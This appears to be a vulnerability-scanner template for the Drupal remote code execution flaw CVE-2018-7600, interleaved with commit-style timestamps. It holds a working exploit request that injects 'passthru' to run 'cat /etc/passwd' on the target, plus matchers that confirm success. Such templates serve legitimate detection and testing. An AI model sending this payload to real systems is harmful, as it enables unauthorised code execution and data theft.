2021-02-15 13:33:33 +00:00
id : CVE-2018-7600
info :
2022-05-13 20:26:43 +00:00
name : Drupal - Remote Code Execution
2021-02-15 13:33:33 +00:00
author : pikpikcu
severity : critical
2022-05-13 20:26:43 +00:00
description : Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
2022-05-17 09:18:12 +00:00
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-7600
cwe-id : CWE-20
2022-07-21 17:18:22 +00:00
tags : cve,cve2018,drupal,rce,kev
2021-02-15 13:33:33 +00:00
requests :
- raw :
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Referer : {{Hostname}}/user/register
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="_drupal_ajax"
matchers-condition : and
matchers :
- type : word
words :
- "application/json"
part : header
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-15 13:33:33 +00:00
part : body
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : status
status :
- 200
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/13